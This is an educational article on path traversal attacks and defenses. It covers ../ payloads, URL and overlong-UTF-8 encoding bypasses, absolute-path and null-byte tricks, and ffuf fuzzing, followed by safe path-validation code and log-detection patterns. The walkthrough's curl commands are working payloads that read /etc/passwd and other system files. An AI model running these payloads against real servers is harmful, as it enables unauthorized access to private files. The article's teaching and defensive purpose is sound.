Path Traversal: Escaping the Web Root with ../, Encoding Tricks, and Null Bytes

Disclaimer: This article is for educational purposes and authorized security testing only. Run these techniques exclusively against systems you own or have explicit, written permission to test (e.g., a bug bounty scope or a signed engagement). Unauthorized access to computer systems is illegal in most jurisdictions.

Introduction / Overview

Path traversal (also called directory traversal or "dot-dot-slash") is one of the oldest and most reliable web vulnerabilities, and it still appears in modern applications, APIs, and even container orchestration tooling. It occurs when an application builds a filesystem path from user input without properly canonicalizing and validating it, letting an attacker step outside the intended base directory and read (or sometimes write) arbitrary files.

In this article you'll learn how the bug arises, how to exploit it with ../ sequences, how to defeat naive filters using encoding bypasses, absolute paths, and legacy null byte tricks, and — just as importantly — how a blue team detects and shuts it down. Path traversal maps to CWE-22 and MITRE ATT&CK technique T1083 (File and Directory Discovery) when used for reconnaissance.

How it works / Background

A vulnerable endpoint typically looks like this:

https://target.tld/download?file=report.pdf
Plaintext

Server-side pseudocode:

$base = "/var/www/app/files/";
$path = $base . $_GET['file'];   // no validation
readfile($path);
PHP

The string concatenation is the flaw. The .. token means "parent directory" on virtually every filesystem, so if the user supplies ../../../../etc/passwd, the resolved path becomes:

/var/www/app/files/../../../../etc/passwd  ->  /etc/passwd
Bash

Because each ../ cancels one directory level, enough of them will always reach the filesystem root, and the rest of the payload (etc/passwd here) is then resolved from the root. This differs from Local File Inclusion (LFI), where the file is executed or included rather than merely read, though the entry point is often identical.
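The resolution step can be reproduced offline. The sketch below is illustrative only: it uses Python's posixpath.normpath to collapse .. segments lexically (symlinks are ignored), and the helper name resolve_concat is hypothetical. The base directory is the one from the pseudocode above.

```python
import posixpath

BASE = "/var/www/app/files/"  # base directory from the pseudocode above


def resolve_concat(user_input: str) -> str:
    """Mimic the vulnerable concatenation, then collapse '..' segments lexically."""
    return posixpath.normpath(BASE + user_input)


print(resolve_concat("report.pdf"))               # stays inside the base directory
print(resolve_concat("../../../../etc/passwd"))   # four levels up reaches /
print(resolve_concat("../" * 10 + "etc/passwd"))  # surplus '../' are clamped at /
```

The last call shows why over-supplying ../ is safe for the attacker: once the path is at the root, further parent references have nowhere to go.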

Prerequisites / Lab setup

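You only need a target with a file-handling parameter and a few CLI tools. Spin up a deliberately vulnerable lab so you can test safely. The /download?file= endpoint used in the walkthrough is illustrative; substitute whatever file-handling parameter your lab target actually exposes: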

# DVWA (Damn Vulnerable Web Application) via Docker
docker run --rm -it -p 8080:80 vulnerables/web-dvwa

# Or bWAPP, or OWASP Juice Shop for a modern Node.js target
docker run --rm -p 3000:3000 bkimminich/juice-shop
Bash

Tools used below: curl, ffuf for fuzzing, and Burp Suite for manual manipulation. Install ffuf:

go install github.com/ffuf/ffuf/v2@latest
Bash

Attack walkthrough / PoC

Step 1 — Baseline and confirm the parameter is file-backed

curl -s "http://localhost:8080/download?file=report.pdf" -o baseline.bin
# Compare a known-good fetch vs a missing file to learn error behavior
curl -si "http://localhost:8080/download?file=nope.pdf" | head -n 1
Bash

Step 2 — The classic ../ payload

On Linux, target /etc/passwd; on Windows, target C:\Windows\win.ini (or use forward slashes, which Windows accepts):

# Linux
curl -s "http://localhost:8080/download?file=../../../../../../etc/passwd"

# Windows backslash variant
curl -s "http://target.tld/download?file=..\\..\\..\\..\\windows\\win.ini"
Bash

Use plenty of ../ — extra sequences past the root are harmless, since /.. from / stays at /.

Step 3 — Encoding bypass when ../ is filtered

Many WAFs and home-grown filters strip the literal string ../. URL-encoding the dot and slash often slips straight through, because the filter inspects the raw string while the web server or framework decodes it only afterwards:

# Single URL-encode:  ../  ->  %2e%2e%2f
curl -s "http://target.tld/download?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

# Encode only the slash
curl -s "http://target.tld/download?file=..%2f..%2f..%2fetc%2fpasswd"
Bash

If the application decodes input twice (e.g., a proxy decodes once, the app once more), use double encoding, where % becomes %25:

# Double URL-encode:  ../  ->  %252e%252e%252f
curl -s "http://target.tld/download?file=%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd"
Bash
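To see why single and double encoding behave differently, it helps to generate and decode the payloads by hand. This is a minimal sketch using only the standard library; the helper names percent_encode_all and double_encode are hypothetical. A custom encoder is needed because urllib.parse.quote leaves the dot unescaped.

```python
from urllib.parse import unquote


def percent_encode_all(text: str) -> str:
    """Percent-encode every byte, including '.', which quote() leaves alone."""
    return "".join(f"%{byte:02x}" for byte in text.encode("utf-8"))


def double_encode(text: str) -> str:
    """Encode once, then encode each '%' of the result as '%25'."""
    return percent_encode_all(text).replace("%", "%25")


single = percent_encode_all("../")
double = double_encode("../")
print(single)                    # %2e%2e%2f
print(double)                    # %252e%252e%252f
print(unquote(double))           # after one decode: %2e%2e%2f
print(unquote(unquote(double)))  # after two decodes: ../
```

A filter that decodes once and then looks for ../ sees only %2e%2e%2f in the double-encoded case, which is why the second decode downstream is what makes the payload live.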

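Older stacks were famously vulnerable to overlong UTF-8 encodings of the slash. The IIS 4.0/5.0 "Unicode" directory traversal bug (CVE-2000-0884) is the best-known case, and Apache Tomcat later had a similar UTF-8 decoding flaw (CVE-2008-2938):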

# Overlong UTF-8 for '/'  ->  %c0%af
curl -s "http://target.tld/scripts/..%c0%af..%c0%af..%c0%afwinnt/win.ini"
Bash
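The byte arithmetic behind %c0%af is easy to check. The sketch below deliberately reproduces the flaw with a hypothetical lenient decoder (lenient_decode_two_byte is not a real library function), then shows that Python's strict UTF-8 decoder refuses the same bytes.

```python
def lenient_decode_two_byte(lead: int, cont: int) -> str:
    """Decode a 2-byte UTF-8 sequence WITHOUT rejecting overlong forms.

    A conforming decoder must reject lead bytes 0xC0 and 0xC1, because the
    resulting code point would have fit in a single byte.
    """
    code_point = ((lead & 0x1F) << 6) | (cont & 0x3F)
    return chr(code_point)


print(lenient_decode_two_byte(0xC0, 0xAF))  # '/'

try:
    b"\xc0\xaf".decode("utf-8")  # strict decoding raises instead of yielding '/'
except UnicodeDecodeError as exc:
    print("rejected:", exc.reason)
```

A filter that searches for the byte 0x2F never sees it in the overlong form, while a lenient decoder further down the stack turns it back into a slash.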

Another classic filter bypass is the nested traversal sequence. If the filter makes a single, non-recursive pass that replaces ../ with an empty string, then ....// collapses back to ../:

curl -s "http://target.tld/download?file=....//....//....//etc/passwd"
Bash
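The collapse is easy to reproduce. In this sketch naive_strip stands in for a hypothetical single-pass filter, and strip_until_stable shows the obvious patch of repeating the removal until the string stops changing.

```python
def naive_strip(value: str) -> str:
    """Hypothetical flawed filter: one non-recursive pass removing '../'."""
    return value.replace("../", "")


def strip_until_stable(value: str) -> str:
    """Repeat the removal until a pass changes nothing."""
    previous = None
    while previous != value:
        previous, value = value, value.replace("../", "")
    return value


payload = "....//....//....//etc/passwd"
print(naive_strip(payload))         # ../../../etc/passwd
print(strip_until_stable(payload))  # etc/passwd
```

Even the repeated version only handles this one spelling of the payload; encoded and absolute variants still get through, so stripping is not a substitute for canonicalizing and validating the final path.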

Step 4 — Absolute path bypass

If the filter only blocks ../ but the code passes input directly to a file API, an absolute path sidesteps traversal entirely — no dot-dot needed:

curl -s "http://target.tld/download?file=/etc/passwd"
# Windows
curl -s "http://target.tld/download?file=C:/Windows/win.ini"
Bash

This works when the base directory is joined in a way that lets an absolute argument override it. Python's os.path.join and Node's path.resolve, for example, discard the earlier components when a later one is absolute; Node's path.join and plain string concatenation do not.
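The override behavior can be confirmed in a couple of lines. This sketch uses posixpath (the POSIX flavor of os.path) so the output is the same on any platform; join_with_base and concat_with_base are hypothetical helper names.

```python
import posixpath

BASE = "/var/www/app/files"


def join_with_base(user_input: str) -> str:
    """Join the way os.path.join does on POSIX: an absolute part resets the path."""
    return posixpath.join(BASE, user_input)


def concat_with_base(user_input: str) -> str:
    """Plain concatenation keeps the base even for absolute input."""
    return BASE + "/" + user_input


print(join_with_base("report.pdf"))     # /var/www/app/files/report.pdf
print(join_with_base("/etc/passwd"))    # /etc/passwd
print(concat_with_base("/etc/passwd"))  # /var/www/app/files//etc/passwd
```

So a "safer-looking" join call can be more exposed to absolute paths than naive concatenation, which is another reason to validate the resolved result rather than the input.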

Step 5 — Null byte truncation (legacy)

Before PHP 5.3.4 (and in some C-based stacks), a null byte (%00) terminated the string at the OS layer, letting you strip a forced extension the app appended:

$path = $base . $_GET['file'] . ".pdf";   // app forces a .pdf suffix
PHP

# %00 cuts off the ".pdf" the server appends
curl -s "http://target.tld/download?file=../../../../etc/passwd%00.pdf"
Bash

This is patched in modern PHP, but still worth testing against legacy or embedded targets.
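The truncation can be modeled without a legacy PHP install. In this sketch c_string_view imitates how a NUL-terminated C API reads the string, and build_path is a hypothetical stand-in for the suffix-forcing code above; neither is a real library function.

```python
def c_string_view(path: str) -> str:
    """Model a C API: everything from the first NUL byte onward is ignored."""
    return path.split("\x00", 1)[0]


def build_path(user_input: str) -> str:
    """Hypothetical app logic that forces a .pdf suffix."""
    return "/var/www/app/files/" + user_input + ".pdf"


requested = build_path("../../../../etc/passwd\x00")
print(repr(requested))           # the application-level string still ends in .pdf
print(c_string_view(requested))  # what a NUL-terminated API would actually open

try:
    open(requested)              # Python 3 rejects embedded NUL bytes outright
except ValueError as exc:
    print("rejected:", exc)
```

The mismatch between the two views is the whole bug: the application believes it is opening a .pdf, while the layer below stops reading at the NUL.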

Step 6 — Automate the fuzzing

ffuf -u "http://target.tld/download?file=FUZZ" \
  -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
  -mr "root:.*:0:0:" -c
Bash

The -mr (match regex) option keeps only responses that contain the /etc/passwd signature, so hits stand out from the error pages returned for every other payload.
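If you post-process responses in your own tooling, the same check is a one-line regular expression. This is a small sketch reusing the pattern from the ffuf command; the function name looks_like_passwd and the sample bodies are made up for illustration.

```python
import re

# Same pattern as the ffuf -mr argument above.
PASSWD_SIGNATURE = re.compile(r"root:.*:0:0:")


def looks_like_passwd(body: str) -> bool:
    """Return True when a response body contains a root entry from /etc/passwd."""
    return PASSWD_SIGNATURE.search(body) is not None


hit = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
miss = "<html><body>404 Not Found</body></html>"
print(looks_like_passwd(hit))   # True
print(looks_like_passwd(miss))  # False
```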

Attack flow diagram

[Diagram 1: path traversal attack flow]

The diagram shows how a traversal payload either passes a missing filter or gets re-encoded to evade one, then gets canonicalized by the OS into a path outside the web root.

Detection & Defense (Blue Team)

Defense must be treated with the same rigor as the attack — a single missed canonicalization step reopens the hole.

1. Canonicalize, then validate. Resolve the path to its absolute form and confirm it still lives under the intended base directory after decoding. Never validate the raw string.

import os

BASE = os.path.realpath("/var/www/app/files")

def safe_path(user_input):
    candidate = os.path.realpath(os.path.join(BASE, user_input))
    # os.path.commonpath defeats prefix-tricks like /var/www/app/files-evil
    if os.path.commonpath([candidate, BASE]) != BASE:
        raise ValueError("Path traversal attempt")
    return candidate
Python

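In Java, use File.getCanonicalPath() and verify that the result starts with the canonical base directory plus a trailing separator; a bare startsWith(baseDir) also accepts siblings such as /var/www/app/files-evil. In Node.js, use path.resolve() (or fs.realpathSync() when symlinks matter) and check that the result begins with the resolved base plus a separator.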
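The prefix trick mentioned in the code comment is worth seeing once. The sketch below compares three containment checks on paths that are assumed to be already canonicalized; the sibling directory and the function names are hypothetical.

```python
import posixpath

BASE = "/var/www/app/files"
INSIDE = "/var/www/app/files/report.pdf"
SIBLING = "/var/www/app/files-evil/secret.txt"  # hypothetical sibling directory


def naive_check(candidate: str) -> bool:
    """Flawed: a plain string prefix also matches sibling directories."""
    return candidate.startswith(BASE)


def separator_check(candidate: str) -> bool:
    """Prefix check that requires a path separator after the base."""
    return candidate == BASE or candidate.startswith(BASE + "/")


def commonpath_check(candidate: str) -> bool:
    """Component-wise check, as used in safe_path above."""
    return posixpath.commonpath([candidate, BASE]) == BASE


for check in (naive_check, separator_check, commonpath_check):
    print(check.__name__, check(INSIDE), check(SIBLING))
```

Only the naive check accepts the sibling path; the other two compare whole path components, which is the property the validation step actually needs.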

2. Prefer indirection over filenames. Map user-supplied IDs to filenames through an allowlist or lookup table so raw paths never reach the filesystem: for example, files = {1: "report.pdf"}, looked up by integer ID.
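A minimal sketch of the lookup approach, assuming a hypothetical in-memory table (a real application would more likely keep this mapping in a database). The names FILES and resolve_download are illustrative.

```python
BASE = "/var/www/app/files"
FILES = {1: "report.pdf", 2: "invoice.pdf"}  # hypothetical allowlist of downloads


def resolve_download(file_id: str) -> str:
    """Translate a user-supplied ID into a server-chosen path."""
    try:
        name = FILES[int(file_id)]
    except (ValueError, KeyError):
        # Non-numeric input and unknown IDs are rejected the same way.
        raise LookupError("unknown file id") from None
    return f"{BASE}/{name}"


print(resolve_download("1"))  # /var/www/app/files/report.pdf
```

Because the user only ever supplies a key, a payload such as ../../etc/passwd fails at int() and never becomes part of a path.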

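3. Don't rely on a forced file extension, and reject null bytes. An appended suffix such as .pdf is not a security control. Reject any input containing %00, a raw 0x00 byte, or control characters outright, and allowlist a strict character set for filenames (e.g., ^[A-Za-z0-9_-]+$, with the extension added server-side).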
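The character allowlist can be sketched as follows. One Python-specific detail is an assumption worth flagging: the sketch uses re.fullmatch rather than re.match with ^...$, because in Python $ also matches just before a trailing newline. The name validate_name is hypothetical.

```python
import re

SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")  # same character set as the pattern above


def validate_name(name: str) -> str:
    """Return the name unchanged if it is allowlisted, else raise ValueError."""
    if SAFE_NAME.fullmatch(name) is None:
        raise ValueError("invalid file name")
    return name


print(validate_name("report_2024"))  # report_2024

for bad in ("../etc/passwd", "report\x00", "report\n", "report.pdf"):
    try:
        validate_name(bad)
    except ValueError:
        print("rejected:", repr(bad))
```

Note that report.pdf is rejected too: with this character set the dot is not allowed, so the application has to append the extension itself.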

4. Least privilege. Run the web process under a low-privilege account with no read access to sensitive files outside the document root. Use chroot, containers, or AppArmor/SELinux profiles so even a successful traversal hits a wall. On Linux, an AppArmor profile denying reads of /etc/shadow and home directories sharply limits impact.

5. Detection. Tune your WAF (the OWASP ModSecurity Core Rule Set's LFI rules, 930100–930130, cover path traversal and access to sensitive OS files) and alert on these signatures in access logs:

# Hunt for traversal attempts in nginx/apache logs (-i also catches %2E, %2F, %C0%AF)
grep -Ei "(\.\./|\.\.%2f|\.\.%5c|\.\.\\\\|%2e%2e|%252e|%c0%af|%00)" /var/log/nginx/access.log

# Count offending source IPs, most active first
awk 'tolower($0) ~ /\.\.%2f|\.\.\// {print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn
Bash
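Static signatures miss whatever encoding depth they were not written for. A complementary approach, sketched here under the assumption that you can run a script over request targets pulled from the log, is to decode repeatedly and test each round. The function name is_suspicious and the max_rounds limit are illustrative choices.

```python
import re
from urllib.parse import unquote

# Traversal markers: '..' followed by a slash or backslash, the overlong
# UTF-8 slash in its percent-encoded form, or a NUL byte.
TRAVERSAL = re.compile(r"\.\.[/\\]|%c0%af|\x00", re.IGNORECASE)


def is_suspicious(request_target: str, max_rounds: int = 5) -> bool:
    """Check the raw value and each successive URL-decoded form."""
    value = request_target
    for _ in range(max_rounds):
        if TRAVERSAL.search(value):
            return True
        decoded = unquote(value)
        if decoded == value:  # nothing left to decode
            return False
        value = decoded
    return TRAVERSAL.search(value) is not None


samples = [
    "/download?file=report.pdf",
    "/download?file=..%2f..%2fetc%2fpasswd",
    "/download?file=%252e%252e%252fetc%252fpasswd",
    "/scripts/..%c0%af..%c0%afwinnt/win.ini",
    "/download?file=../../etc/passwd%00.pdf",
]
for target in samples:
    print(is_suspicious(target), target)
```

Each round is checked before decoding further because unquote replaces invalid UTF-8 such as %c0%af with a replacement character, which would otherwise hide the overlong-slash marker.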

Map alerts to MITRE ATT&CK T1190 (Exploit Public-Facing Application) for ingress and T1083 for the discovery intent. Feed WAF blocks and 200-responses that returned root:x:0:0 patterns into your SIEM as high-severity detections.

For related server-side compromise paths, see LFI to RCE techniques and Server-Side Request Forgery. Once you have file read, pivot ideas live in post-exploitation enumeration.

Conclusion

Path traversal survives because developers keep concatenating untrusted input into filesystem paths and validating the wrong representation of that input. The offensive surface is broad — ../, single and double URL encoding, overlong UTF-8, nested ....//, absolute paths, and legacy null bytes — but the defense reduces to one principle: canonicalize first, then prove the result stays inside your base directory, and back that with least-privilege and good logging. Test every file-handling parameter; the bug is rarely where the marketing copy says the "file upload" feature lives.
